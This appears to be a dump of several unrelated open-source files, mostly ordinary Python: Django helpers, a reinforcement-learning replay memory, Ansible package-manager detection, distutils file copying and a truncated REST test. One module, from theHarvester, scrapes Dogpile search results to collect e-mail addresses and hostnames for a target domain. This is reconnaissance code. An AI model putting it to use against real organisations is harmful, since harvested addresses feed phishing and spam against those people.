    url(r'^chirps/$', 'chirper.views.chirping', name='chirps'),
    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # Uncomment the next line to enable the admin:
    # url(r'^admin/', include(admin.site.urls)),
)
| apache-2.0 |
killswitch-GUI/theHarvester | discovery/dogpilesearch.py | 23 | 1374 | import httplib
import myparser
import time
import sys
class search_dogpile:
    # Python 2-only scraper: pages through Dogpile web-search results for
    # "@<word>" and accumulates the raw HTML for later e-mail/hostname
    # extraction by myparser.
    def __init__(self, word, limit):
        # word: the domain/keyword to search; limit: maximum result offset to page to.
        self.word = word
        # Raw HTML of every results page fetched so far, concatenated.
        self.total_results = ""
        self.server = "www.dogpile.com"
        self.hostname = "www.dogpile.com"
        # NOTE(review): this User-Agent string has an unbalanced opening paren;
        # harmless to the request, but probably unintended.
        self.userAgent = "(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
        self.limit = limit
        # Result offset (qsi parameter) of the next page to request.
        self.counter = 0
    def do_search(self):
        # NOTE(review): httplib.HTTP is the long-deprecated Python 2 legacy
        # interface; httplib.HTTPConnection is the modern equivalent.
        h = httplib.HTTP(self.server)
        # Dogpile is hardcoded to return 10 results
        h.putrequest('GET', "/search/web?qsi=" + str(self.counter)
                     + "&q=\"%40" + self.word + "\"")
        h.putheader('Host', self.hostname)
        h.putheader('User-agent', self.userAgent)
        h.endheaders()
        returncode, returnmsg, headers = h.getreply()
        self.total_results += h.getfile().read()
    def process(self):
        # Fetch pages of 10 until the caller's limit (capped at 1000) is
        # reached, sleeping between requests to throttle the scraping.
        while self.counter <= self.limit and self.counter <= 1000:
            self.do_search()
            time.sleep(1)
            print "\tSearching " + str(self.counter) + " results..."
            self.counter += 10
    def get_emails(self):
        # Delegate extraction of e-mail addresses to the shared myparser helper.
        rawres = myparser.parser(self.total_results, self.word)
        return rawres.emails()
    def get_hostnames(self):
        # Delegate extraction of hostnames to the shared myparser helper.
        rawres = myparser.parser(self.total_results, self.word)
        return rawres.hostnames()
| gpl-2.0 |
Kismuz/btgym | btgym/algorithms/memory.py | 1 | 10633 | # This implementation is based on Kosuke Miyoshi code, under Apache License 2.0:
# https://miyosuda.github.io/
# https://github.com/miyosuda/unreal
from logbook import Logger, StreamHandler, WARNING
import sys
import numpy as np
from collections import deque
from btgym.algorithms.rollout import Rollout
class Memory(object):
    """
    Replay memory with rebalanced replay based on reward value.

    Frames are tracked by two index queues: 'zero reward'
    (|reward| <= reward_threshold) and 'non-zero reward' (prioritized);
    _sample_priority() draws from them with a skewed probability.

    Note:
        must be filled up before calling sampling methods.
    """

    def __init__(self, history_size, max_sample_size, priority_sample_size, log_level=WARNING,
                 rollout_provider=None, task=-1, reward_threshold=0.1, use_priority_sampling=False):
        """
        Args:
            history_size: number of experiences stored;
            max_sample_size: maximum allowed sample size (e.g. off-policy rollout length);
            priority_sample_size: sample size of priority_sample() method
            log_level: int, logbook.level;
            rollout_provider: callable returning list of Rollouts NOT USED
            task: parent worker id;
            reward_threshold: if |experience.reward| > reward_threshold: experience is saved as 'prioritized';
            use_priority_sampling: when False, sample_priority() is a no-op returning None.
        """
        self._history_size = history_size
        # deque(maxlen=...) silently drops the oldest frame once full:
        self._frames = deque(maxlen=history_size)
        self.reward_threshold = reward_threshold
        self.max_sample_size = int(max_sample_size)
        self.priority_sample_size = int(priority_sample_size)
        self.rollout_provider = rollout_provider
        self.task = task
        self.log_level = log_level
        StreamHandler(sys.stdout).push_application()
        self.log = Logger('ReplayMemory_{}'.format(self.task), level=self.log_level)
        self.use_priority_sampling = use_priority_sampling
        # Indices for non-priority frames:
        self._zero_reward_indices = deque()
        # Indices for priority frames:
        self._non_zero_reward_indices = deque()
        # Ever-increasing global index of the oldest frame still stored;
        # frame_index - _top_frame_index gives the position inside _frames.
        self._top_frame_index = 0
        if use_priority_sampling:
            self.sample_priority = self._sample_priority
        else:
            self.sample_priority = self._sample_dummy

    def add(self, frame):
        """
        Appends single experience frame to memory.

        Args:
            frame: dictionary of values.
        """
        if frame['terminal'] and len(self._frames) > 0 and self._frames[-1]['terminal']:
            # Discard if terminal frame continues
            self.log.warning("Memory_{}: Sequential terminal frame encountered. Discarded.".format(self.task))
            self.log.warning('{} -- {}'.format(self._frames[-1]['position'], frame['position']))
            return

        # Global index of the frame being appended:
        frame_index = self._top_frame_index + len(self._frames)
        was_full = self.is_full()

        # Append frame:
        self._frames.append(frame)

        # Decide and append index; frames earlier than max_sample_size - 1
        # can never end a sample, so they are not indexed at all:
        if frame_index >= self.max_sample_size - 1:
            if abs(frame['reward']) <= self.reward_threshold:
                self._zero_reward_indices.append(frame_index)
            else:
                self._non_zero_reward_indices.append(frame_index)

        if was_full:
            # Decide from which index to discard:
            self._top_frame_index += 1
            # Indices below this can no longer start a full sample window:
            cut_frame_index = self._top_frame_index + self.max_sample_size - 1
            # Cut frame if its index is lower than cut_frame_index:
            if len(self._zero_reward_indices) > 0 and \
                    self._zero_reward_indices[0] < cut_frame_index:
                self._zero_reward_indices.popleft()
            if len(self._non_zero_reward_indices) > 0 and \
                    self._non_zero_reward_indices[0] < cut_frame_index:
                self._non_zero_reward_indices.popleft()

    def add_rollout(self, rollout):
        """
        Adds frames from given rollout to memory with respect to episode continuation.

        Args:
            rollout: `Rollout` instance.
        """
        # Check if current rollout is direct extension of last stored frame sequence:
        if len(self._frames) > 0 and not self._frames[-1]['terminal']:
            # E.g. check if it is same local episode and successive frame order:
            if self._frames[-1]['position']['episode'] == rollout['position']['episode'][0] and \
                    self._frames[-1]['position']['step'] + 1 == rollout['position']['step'][0]:
                # Means it is ok to just extend previously stored episode
                pass
            else:
                # Means part or tail of previously recorded episode is somehow lost,
                # so we need to mark stored episode as 'ended':
                self._frames[-1]['terminal'] = True
                self.log.warning('{} changed to terminal'.format(self._frames[-1]['position']))
                # If we get a lot of such messages it is an indication something is going wrong.

        # Add experiences one by one:
        # TODO: pain-slow.
        for i in range(len(rollout['terminal'])):
            frame = rollout.get_frame(i)
            self.add(frame)

    def is_full(self):
        # True once history_size frames have been stored.
        return len(self._frames) >= self._history_size

    def fill(self):
        """
        Fills replay memory with initial experiences. NOT USED.
        Supposed to be called by parent worker() just before training begins.

        Raises:
            AttributeError: if no rollout_provider was configured.
        """
        if self.rollout_provider is not None:
            while not self.is_full():
                for rollout in self.rollout_provider():
                    self.add_rollout(rollout)
            self.log.info('Memory_{}: filled.'.format(self.task))
        else:
            raise AttributeError('Rollout_provider is None, can not fill memory.')

    def sample_uniform(self, sequence_size):
        """
        Uniformly samples sequence of successive frames of size `sequence_size` or less (~off-policy rollout).

        Args:
            sequence_size: maximum sample size.

        Returns:
            instance of Rollout of size <= sequence_size.
        """
        start_pos = np.random.randint(0, self._history_size - sequence_size - 1)
        # Shift by one if hit terminal frame:
        if self._frames[start_pos]['terminal']:
            start_pos += 1  # assuming that there are no successive terminal frames.

        sampled_rollout = Rollout()

        for i in range(sequence_size):
            frame = self._frames[start_pos + i]
            sampled_rollout.add(frame)
            if frame['terminal']:
                break  # it's ok to return less than `sequence_size` frames if `terminal` frame encountered.

        return sampled_rollout

    def _sample_priority(self, size=None, exact_size=False, skewness=2, sample_attempts=100):
        """
        Implements rebalanced replay.
        Samples sequence of successive frames from distribution skewed by means of reward of last sample frame.

        Args:
            size: sample size, must be <= self.max_sample_size;
            exact_size: whether accept sample with size less than 'size'
                or re-sample to get sample of exact size (used for reward prediction task);
            skewness: int>=1, sampling probability denominator, such as probability of sampling sequence with
                last frame having non-zero reward is: p[non_zero]=1/skewness;
            sample_attempts: if exact_size=True, sets number of re-sampling attempts
                to get sample of continuous experiences (no `Terminal` frames inside except last one);
                if number is reached - sample returned 'as is'.

        Returns:
            instance of Rollout().
        """
        if size is None:
            size = self.priority_sample_size
        if size > self.max_sample_size:
            size = self.max_sample_size
        # Toss skewed coin: with probability 1/skewness draw a prioritized
        # (non-zero-reward-ending) sequence:
        if np.random.randint(int(skewness)) == 0:
            from_zero = False
        else:
            from_zero = True

        # Fall back when the chosen container is empty:
        if len(self._zero_reward_indices) == 0:
            # zero rewards container was empty
            from_zero = False
        elif len(self._non_zero_reward_indices) == 0:
            # non zero rewards container was empty
            from_zero = True

        # Try to sample sequence of given length from one episode.
        # Take maximum of 'sample_attempts', if no luck
        # (e.g too short episodes and/or too big sampling size) ->
        # return inconsistent sample and issue warning.
        check_sequence = True
        for attempt in range(sample_attempts):
            # The sampled index is the *last* frame of the sequence:
            if from_zero:
                index = np.random.randint(len(self._zero_reward_indices))
                end_frame_index = self._zero_reward_indices[index]
            else:
                index = np.random.randint(len(self._non_zero_reward_indices))
                end_frame_index = self._non_zero_reward_indices[index]

            start_frame_index = end_frame_index - size + 1
            # Convert global index to position inside the deque:
            raw_start_frame_index = start_frame_index - self._top_frame_index

            sampled_rollout = Rollout()
            is_full = True

            if attempt == sample_attempts - 1:
                # Last chance: accept whatever comes out, consistent or not.
                check_sequence = False
                self.log.warning(
                    'Memory_{}: failed to sample {} successive frames, sampled as is.'.format(self.task, size)
                )

            for i in range(size - 1):
                frame = self._frames[raw_start_frame_index + i]
                sampled_rollout.add(frame)
                if check_sequence:
                    if frame['terminal']:
                        # Mid-sequence terminal: reject (if exact_size) and retry.
                        if exact_size:
                            is_full = False
                        #print('attempt:', attempt)
                        #print('frame.terminal:', frame['terminal'])
                        break
            # Last frame can be terminal anyway:
            frame = self._frames[raw_start_frame_index + size - 1]
            sampled_rollout.add(frame)

            if is_full:
                break

        return sampled_rollout

    @staticmethod
    def _sample_dummy(**kwargs):
        # Stand-in bound to self.sample_priority when priority sampling is off.
        return None
class _DummyMemory:
    """No-op stand-in mirroring the Memory sampling interface.

    Every sampling call yields None and the store always reports itself
    as full, so calling code can run unchanged without a real replay buffer.
    """

    def __init__(self):
        pass

    @staticmethod
    def add(frame):
        # Discard the frame; nothing is stored.
        return None

    @staticmethod
    def sample_uniform(**kwargs):
        # No data to sample.
        return None

    @staticmethod
    def sample_priority(**kwargs):
        # No data to sample.
        return None

    @staticmethod
    def is_full():
        # Report full so callers never wait for the buffer to fill.
        return True
xgds/xgds_data | xgds_data/introspection.py | 1 | 9624 | #__BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#__END_LICENSE__
try:
from taggit.managers import TaggableManager
except (ImportError, RuntimeError):
pass
from django.conf import settings
from django.db.models import fields
try:
from django.apps import apps
except ImportError:
from django.db.models import get_app
#from xgds_data.models import VirtualIncludedField
import xgds_data.models
def settingsForModel(settng, model):
    """
    Collect the entries that the two-level setting *settng* (a dict of
    app_label -> {object_name: [entries]}) lists for *model*, walking the
    model's whole MRO so inherited configuration is picked up too.
    """
    collected = []
    for ancestor in model.__mro__:
        try:
            per_app = settng.get(ancestor._meta.app_label)
            collected += per_app.get(ancestor._meta.object_name, [])
        except (AttributeError, KeyError):
            # Plain base classes (e.g. object) have no _meta, and apps
            # absent from the setting yield None; both are skipped.
            pass
    return collected
def accessorDict(model):
    """
    Return a dict mapping every accessor name usable on *model* (direct
    fields, many-to-many fields, and reverse relations) to the
    corresponding field/relation object.
    """
    meta = model._meta
    accessors = {x.name: x for x in meta.fields}
    accessors.update({x.name: x for x in meta.many_to_many})
    ## do we need virtual_fields? Not sure what those are
    accessors.update({x.get_accessor_name(): x for x in meta.get_all_related_objects()})
    accessors.update({x.get_accessor_name(): x for x in meta.get_all_related_many_to_many_objects()})
    return accessors
def modelFields(model):
    """
    Retrieve the fields associated with the given model.

    Combines concrete, many-to-many and virtual fields from _meta, names
    of reverse foreign-key descriptors found on the class, and any
    VirtualIncludedField requested via settings.XGDS_DATA_EXPAND_RELATED.
    """
    # BUGFIX: these locals were previously named 'fields', shadowing the
    # django.db.models.fields module imported at the top of this file.
    # That made the isinstance() check below look up .related on a field
    # list, always raising a (caught) AttributeError, so reverse-FK
    # descriptors were silently never detected.
    concrete = model._meta.fields
    m2m = model._meta.many_to_many
    virtual = model._meta.virtual_fields
    try:
        myfields = concrete + m2m + virtual
    except TypeError:
        ## concrete and m2m are tuples in Django 1.9, virtual_fields a list
        myfields = concrete + m2m + tuple(virtual)
    fieldNames = [x.name for x in myfields]
    for x in dir(model):
        try:
            # Reverse foreign-key accessors live as descriptors on the class
            # rather than as _meta entries.
            if isinstance(getattr(model, x), fields.related.ForeignRelatedObjectsDescriptor):
                fieldNames.append(x)
        except AttributeError:
            ## django may throw AttributeError even for things listed by dir;
            ## also raised if this Django version lacks the descriptor class.
            pass
    try:
        expands = settingsForModel(settings.XGDS_DATA_EXPAND_RELATED, model)
    except AttributeError:
        # Setting not defined: nothing to expand.
        expands = []
    for throughFieldName, relName, relVerboseName in expands:
        if (throughFieldName is not None) and (throughFieldName in fieldNames):
            myfields = myfields + (xgds_data.models.VirtualIncludedField(model, throughFieldName, relName, relVerboseName),)
        else:
            print("Error- VirtualField {0} on {1} references nonexistent field {2}".format(relVerboseName, modelName(model), throughFieldName))
    return myfields
def isAbstract(model):
    """
    Report whether *model* is declared abstract in its Meta options.
    """
    meta = model._meta
    return meta.abstract
def pk(model):
    """
    Return the primary key field declared on *model*'s options.
    """
    meta = model._meta
    return meta.pk
def pkValue(instance):
    """
    Return the primary key *value* of *instance*.

    Prefers the standard ``pk`` shortcut; for objects lacking it, reads the
    declared primary-key attribute and, if that attribute is itself an
    object carrying its own ``pk``, unwraps it.
    """
    try:
        return instance.pk
    except AttributeError:
        pass
    raw = getattr(instance, pk(instance).name)
    try:
        return raw.pk
    except AttributeError:
        return raw
def modelName(model):
    """
    return the short name of the model (or of the instance's model)
    """
    # Resolved via the concrete model so proxy/derived classes report the
    # underlying table-backed model's name.
    return concrete_model(model)._meta.object_name
def qualifiedModelName(model):
    """
    Return the long model name with the module included,
    e.g. 'myapp.models.MyModel'.
    """
    return '.'.join([model.__module__, modelName(model)])
def moduleName(model):
    """
    Return the short app label of the model (or of the instance's model).
    """
    meta = model._meta
    return meta.app_label
def verbose_name(model):
    """
    Return the human-readable model name, title-cased for display.
    """
    ## return model._meta.verbose_name_raw
    raw = model._meta.verbose_name
    return raw.title()
def verbose_name_plural(model):
    """
    Return the human-readable plural model name, title-cased for display.
    """
    raw = model._meta.verbose_name_plural
    return raw.title()
def db_table(model):
    """
    Return the name of the database table backing this model.
    """
    meta = model._meta
    return meta.db_table
# def resolveModule(moduleName):
# """
# Return the module with this name
# """
# try:
# return apps.get_app_config(moduleName).module
# except NameError:
# return get_app(moduleName)
def getModuleNames():
    """Return the names of all installed Django apps."""
    try:
        return [x.name for x in apps.get_app_configs()]
    except NameError:
        # Fallback for old Django without the app registry.
        # NOTE(review): get_apps is never imported in this module (only
        # get_app is), so this branch would itself raise NameError --
        # confirm and import it, or drop the fallback.
        return [app.__name__ for app in get_apps()]
def getModels(moduleName):
    """Return the models declared by the app named *moduleName*."""
    try:
        return apps.get_app_config(moduleName).get_models()
    except NameError:
        # Fallback for old Django without the app registry.
        # NOTE(review): get_models is never imported in this module, so
        # this branch would itself raise NameError -- confirm and fix.
        return get_models(get_app(moduleName))
def resolveModel(moduleName, modelName):
    """
    Return the model with this name

    Uses the modern app registry when available; otherwise looks the
    model up as an attribute of the old-style app module.
    """
    try:
        # aconfig = apps.get_app_config(moduleName)
        #
        # return aconfig.get_model(modelName)
        return apps.get_model(moduleName, modelName)
    except NameError:
        # 'apps' unavailable on old Django versions.
        modelmodule = get_app(moduleName)
        return getattr(modelmodule, modelName)
def resolveField(model, fieldName):
    """
    Retrieve the field of *model* matching the given name; None if absent.
    """
    for f in modelFields(model):
        if (fieldName == f.name):
            return f
    return None
def maskField(field):
    """
    Should we omit this field from search and display?

    Order matters: tag managers are always masked; an explicit entry in
    XGDS_DATA_UNMASKED_FIELDS wins over every later rule; then explicit
    masks, primary keys, and single-underscore names are masked.
    """
    try:
        if isinstance(field, TaggableManager):
            return True
    except NameError:
        # taggit is optional; if its import failed at module load,
        # TaggableManager is simply undefined.
        pass
    try:
        if field.name in settingsForModel(settings.XGDS_DATA_UNMASKED_FIELDS, field.model):
            return False
    except AttributeError:
        # Setting absent or field has no model attribute.
        pass
    try:
        if field.name in settingsForModel(settings.XGDS_DATA_MASKED_FIELDS, field.model):
            return True
    except AttributeError:
        pass
    try:
        # Primary keys are hidden by default.
        if field is pk(field.model):
            return True
    except AttributeError:
        pass
    # Single-underscore (but not dunder) names are treated as private.
    if field.name.startswith("_") and not field.name.startswith("__"):
        return True
    return False
def isOrdinalOveridden(model, field):
    """
    Is this a field that looks ordinal, but isn't really?

    True when the field is listed in settings.XGDS_DATA_NONORDINAL_FIELDS
    for this model. (The 'Overidden' spelling is part of the public name.)
    """
    try:
        return field.name in settingsForModel(settings.XGDS_DATA_NONORDINAL_FIELDS, model)
    except AttributeError:
        # Setting absent -> nothing is overridden.
        return False
def isNumeric(model, field):
    """
    Is this a number field? Some aren't handled, though

    A field whose storage type is numeric can still be excluded by being
    declared non-ordinal in settings (see isOrdinalOveridden).
    """
    return (isinstance(field, (fields.AutoField,
                               fields.BigIntegerField,
                               fields.DecimalField,
                               fields.FloatField,
                               fields.IntegerField,
                               fields.PositiveIntegerField,
                               fields.PositiveSmallIntegerField,
                               fields.SmallIntegerField))
            and not isOrdinalOveridden(model, field))
def fieldModel(field):
    """
    Return the model that actually stores this field's data.

    Virtual fields delegate to their first target field, recursively;
    anything without a (non-empty) targetFields() answers with its own
    model attribute.
    """
    try:
        targets = field.targetFields()
        return fieldModel(targets[0])
    except (IndexError, AttributeError):
        return field.model
def parentField(model, parent):
    """
    Return the link field of *model* that points to the given parent model.
    """
    parent_links = model._meta.parents
    return parent_links[parent]
## need to make this handle virtual field properly- probably pull out code from form and put in virtual field
def ordinalField(model, field):
    """
    Does this field support ranges?

    Non-ordinal overrides from settings win; a VirtualIncludedField is
    ordinal only if every one of its target fields is; otherwise the
    decision is by storage type.
    """
    if isOrdinalOveridden(model, field):
        return False
    elif isinstance(field, xgds_data.models.VirtualIncludedField):
        if len(field.targetFields()):
            for tmf in field.targetFields():
                if not ordinalField(tmf.model, tmf):
                    return False
            return True
        else:
            ## I think we missed it
            return False;
    elif isinstance(field, (fields.AutoField,
                            fields.DateTimeField,
                            fields.DateField,
                            fields.DecimalField,
                            fields.FloatField,
                            fields.IntegerField,
                            fields.PositiveIntegerField)):
        return True
    else:
        return False
def concreteDescendants(model):
    """
    Get non-abstract descendants of this class. Does not check subclasses
    on concrete descendants.

    An abstract model expands (recursively) into its subclasses; a
    concrete model answers with itself only.
    """
    if isAbstract(model):
        submodels = []
        for sub in model.__subclasses__():
            submodels = submodels + concreteDescendants(sub)
        return submodels
    else:
        return [model]
def concrete_model(model):
    """
    Return the concrete (table-backed) model behind *model*.
    """
    meta = model._meta
    return meta.concrete_model
def fullid(record):
    """An id that includes class info, formatted 'app:Model:pk'."""
    return '%s:%s:%s' % (moduleName(record),
                         modelName(record),
                         record.pk)
##                       getattr(record,pk(record).name))
| apache-2.0 |
tux-00/ansible | lib/ansible/module_utils/facts/system/pkg_mgr.py | 46 | 3045 | # Collect facts related to the system package manager
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.module_utils.facts.collector import BaseFactCollector
# A list of dicts. If there is a platform with more than one
# package manager, put the preferred one last. If there is an
# ansible module, use that as the value for the 'name' key.
# (PkgMgrFactCollector.collect() scans this list without breaking, so
# the LAST entry whose path exists wins.)
PKG_MGRS = [{'path': '/usr/bin/yum', 'name': 'yum'},
            {'path': '/usr/bin/dnf', 'name': 'dnf'},
            {'path': '/usr/bin/apt-get', 'name': 'apt'},
            {'path': '/usr/bin/zypper', 'name': 'zypper'},
            {'path': '/usr/sbin/urpmi', 'name': 'urpmi'},
            {'path': '/usr/bin/pacman', 'name': 'pacman'},
            {'path': '/bin/opkg', 'name': 'opkg'},
            {'path': '/usr/pkg/bin/pkgin', 'name': 'pkgin'},
            {'path': '/opt/local/bin/pkgin', 'name': 'pkgin'},
            {'path': '/opt/tools/bin/pkgin', 'name': 'pkgin'},
            {'path': '/opt/local/bin/port', 'name': 'macports'},
            {'path': '/usr/local/bin/brew', 'name': 'homebrew'},
            {'path': '/sbin/apk', 'name': 'apk'},
            {'path': '/usr/sbin/pkg', 'name': 'pkgng'},
            {'path': '/usr/sbin/swlist', 'name': 'HP-UX'},
            {'path': '/usr/bin/emerge', 'name': 'portage'},
            {'path': '/usr/sbin/pkgadd', 'name': 'svr4pkg'},
            {'path': '/usr/bin/pkg', 'name': 'pkg5'},
            {'path': '/usr/bin/xbps-install', 'name': 'xbps'},
            {'path': '/usr/local/sbin/pkg', 'name': 'pkgng'},
            {'path': '/usr/bin/swupd', 'name': 'swupd'},
            {'path': '/usr/sbin/sorcery', 'name': 'sorcery'},
            ]
# the fact ends up being 'pkg_mgr' so stick with that naming/spelling
class PkgMgrFactCollector(BaseFactCollector):
    name = 'pkg_mgr'
    _fact_ids = set()

    def collect(self, module=None, collected_facts=None):
        """Return {'pkg_mgr': <name>} based on which manager binaries exist.

        OpenBSD is special-cased; otherwise every PKG_MGRS path is probed
        and the name defaults to 'unknown' when none is found.
        """
        facts_dict = {}
        collected_facts = collected_facts or {}

        pkg_mgr_name = None
        if collected_facts.get('system') == 'OpenBSD':
            facts_dict['pkg_mgr'] = 'openbsd_pkg'
            return facts_dict

        pkg_mgr_name = 'unknown'
        # Deliberately no 'break': PKG_MGRS orders preferred managers last,
        # so the LAST existing path wins.
        for pkg in PKG_MGRS:
            if os.path.exists(pkg['path']):
                pkg_mgr_name = pkg['name']

        facts_dict['pkg_mgr'] = pkg_mgr_name
        return facts_dict
| gpl-3.0 |
SerCeMan/intellij-community | python/lib/Lib/distutils/file_util.py | 81 | 8341 | """distutils.file_util
Utility functions for operating on single files.
"""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: file_util.py 37828 2004-11-10 22:23:15Z loewis $"
import os
from distutils.errors import DistutilsFileError
from distutils import log
# for generating verbose output in 'copy_file()'; keyed by the 'link'
# argument (None means a plain content copy)
_copy_action = { None: 'copying',
                 'hard': 'hard linking',
                 'sym': 'symbolically linking' }
def _copy_file_contents (src, dst, buffer_size=16*1024):
    """Copy the file 'src' to 'dst'; both must be filenames. Any error
    opening either file, reading from 'src', or writing to 'dst', raises
    DistutilsFileError. Data is read/written in chunks of 'buffer_size'
    bytes (default 16k). No attempt is made to handle anything apart from
    regular files.
    """
    # Stolen from shutil module in the standard library, but with
    # custom error-handling added.
    fsrc = None
    fdst = None
    try:
        try:
            fsrc = open(src, 'rb')
        except os.error, (errno, errstr):
            raise DistutilsFileError, \
                  "could not open '%s': %s" % (src, errstr)

        # Remove an existing destination first so the open below creates
        # a fresh file (and fails cleanly if the directory is read-only).
        if os.path.exists(dst):
            try:
                os.unlink(dst)
            except os.error, (errno, errstr):
                raise DistutilsFileError, \
                      "could not delete '%s': %s" % (dst, errstr)

        try:
            fdst = open(dst, 'wb')
        except os.error, (errno, errstr):
            raise DistutilsFileError, \
                  "could not create '%s': %s" % (dst, errstr)

        while 1:
            try:
                buf = fsrc.read(buffer_size)
            except os.error, (errno, errstr):
                raise DistutilsFileError, \
                      "could not read from '%s': %s" % (src, errstr)

            # Empty read means end-of-file.
            if not buf:
                break

            try:
                fdst.write(buf)
            except os.error, (errno, errstr):
                raise DistutilsFileError, \
                      "could not write to '%s': %s" % (dst, errstr)

    finally:
        # Both handles are closed whether the copy succeeded or not.
        if fdst:
            fdst.close()
        if fsrc:
            fsrc.close()

# _copy_file_contents()
def copy_file (src, dst,
               preserve_mode=1,
               preserve_times=1,
               update=0,
               link=None,
               verbose=0,
               dry_run=0):
    """Copy a file 'src' to 'dst'. If 'dst' is a directory, then 'src' is
    copied there with the same name; otherwise, it must be a filename. (If
    the file exists, it will be ruthlessly clobbered.) If 'preserve_mode'
    is true (the default), the file's mode (type and permission bits, or
    whatever is analogous on the current platform) is copied. If
    'preserve_times' is true (the default), the last-modified and
    last-access times are copied as well. If 'update' is true, 'src' will
    only be copied if 'dst' does not exist, or if 'dst' does exist but is
    older than 'src'.

    'link' allows you to make hard links (os.link) or symbolic links
    (os.symlink) instead of copying: set it to "hard" or "sym"; if it is
    None (the default), files are copied. Don't set 'link' on systems that
    don't support it: 'copy_file()' doesn't check if hard or symbolic
    linking is available.

    Under Mac OS, uses the native file copy function in macostools; on
    other systems, uses '_copy_file_contents()' to copy file contents.

    Return a tuple (dest_name, copied): 'dest_name' is the actual name of
    the output file, and 'copied' is true if the file was copied (or would
    have been copied, if 'dry_run' true).
    """
    # XXX if the destination file already exists, we clobber it if
    # copying, but blow up if linking. Hmmm. And I don't know what
    # macostools.copyfile() does. Should definitely be consistent, and
    # should probably blow up if destination exists and we would be
    # changing it (ie. it's not already a hard/soft link to src OR
    # (not update) and (src newer than dst).

    from distutils.dep_util import newer
    from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE

    if not os.path.isfile(src):
        raise DistutilsFileError, \
              "can't copy '%s': doesn't exist or not a regular file" % src

    # Directory destination: keep the source's basename.
    if os.path.isdir(dst):
        dir = dst
        dst = os.path.join(dst, os.path.basename(src))
    else:
        dir = os.path.dirname(dst)

    if update and not newer(src, dst):
        log.debug("not copying %s (output up-to-date)", src)
        return dst, 0

    try:
        action = _copy_action[link]
    except KeyError:
        raise ValueError, \
              "invalid value '%s' for 'link' argument" % link
    if os.path.basename(dst) == os.path.basename(src):
        log.info("%s %s -> %s", action, src, dir)
    else:
        log.info("%s %s -> %s", action, src, dst)

    if dry_run:
        return (dst, 1)

    # On Mac OS, use the native file copy routine
    if os.name == 'mac':
        import macostools
        try:
            macostools.copy(src, dst, 0, preserve_times)
        except os.error, exc:
            raise DistutilsFileError, \
                  "could not copy '%s' to '%s': %s" % (src, dst, exc[-1])

    # If linking (hard or symbolic), use the appropriate system call
    # (Unix only, of course, but that's the caller's responsibility)
    elif link == 'hard':
        if not (os.path.exists(dst) and os.path.samefile(src, dst)):
            os.link(src, dst)
    elif link == 'sym':
        if not (os.path.exists(dst) and os.path.samefile(src, dst)):
            os.symlink(src, dst)

    # Otherwise (non-Mac, not linking), copy the file contents and
    # (optionally) copy the times and mode.
    else:
        _copy_file_contents(src, dst)
        if preserve_mode or preserve_times:
            st = os.stat(src)

            # According to David Ascher <da@ski.org>, utime() should be done
            # before chmod() (at least under NT).
            if preserve_times:
                os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
            if preserve_mode and hasattr(os, 'chmod'):
                os.chmod(dst, S_IMODE(st[ST_MODE]))

    return (dst, 1)

# copy_file ()
# XXX I suspect this is Unix-specific -- need porting help!
def move_file (src, dst,
               verbose=0,
               dry_run=0):
    """Move a file 'src' to 'dst'. If 'dst' is a directory, the file will
    be moved into it with the same name; otherwise, 'src' is just renamed
    to 'dst'. Return the new full name of the file.

    Handles cross-device moves on Unix using 'copy_file()'. What about
    other systems???
    """
    from os.path import exists, isfile, isdir, basename, dirname
    import errno

    log.info("moving %s -> %s", src, dst)

    if dry_run:
        return dst

    if not isfile(src):
        raise DistutilsFileError, \
              "can't move '%s': not a regular file" % src

    if isdir(dst):
        dst = os.path.join(dst, basename(src))
    elif exists(dst):
        raise DistutilsFileError, \
              "can't move '%s': destination '%s' already exists" % \
              (src, dst)

    if not isdir(dirname(dst)):
        raise DistutilsFileError, \
              "can't move '%s': destination '%s' not a valid path" % \
              (src, dst)

    # First try a plain rename; EXDEV means src and dst are on different
    # filesystems, in which case we fall back to copy-then-delete.
    copy_it = 0
    try:
        os.rename(src, dst)
    except os.error, (num, msg):
        if num == errno.EXDEV:
            copy_it = 1
        else:
            raise DistutilsFileError, \
                  "couldn't move '%s' to '%s': %s" % (src, dst, msg)

    if copy_it:
        copy_file(src, dst)
        try:
            os.unlink(src)
        except os.error, (num, msg):
            # Deleting the source failed: try to undo the copy so we don't
            # leave two files behind, then report the failure.
            try:
                os.unlink(dst)
            except os.error:
                pass
            raise DistutilsFileError, \
                  ("couldn't move '%s' to '%s' by copy/delete: " +
                   "delete '%s' failed: %s") % \
                  (src, dst, src, msg)

    return dst

# move_file ()
def write_file (filename, contents):
    """Create a file with the specified name and write 'contents' (a
    sequence of strings without line terminators) to it.
    """
    # The close is guarded with try/finally so the handle is released even
    # if a write fails (previously it leaked on error). try/finally rather
    # than 'with' keeps the module's stated Python 2.1 compatibility.
    f = open(filename, "w")
    try:
        for line in contents:
            f.write(line + "\n")
    finally:
        f.close()
JesGor/test_rest | apprest/tests.py | 1 | 1668 | from rest_framework import status
from rest_framework.test import APITestCase
from .models import Empresa, Calificacion
from .views import *
class EmpresaRESTTests(APITestCase):
    """REST-API tests for the Empresa (company) endpoints."""

    def test_crear_empresa(self):
        # POSTing a company payload must create exactly one Empresa row.
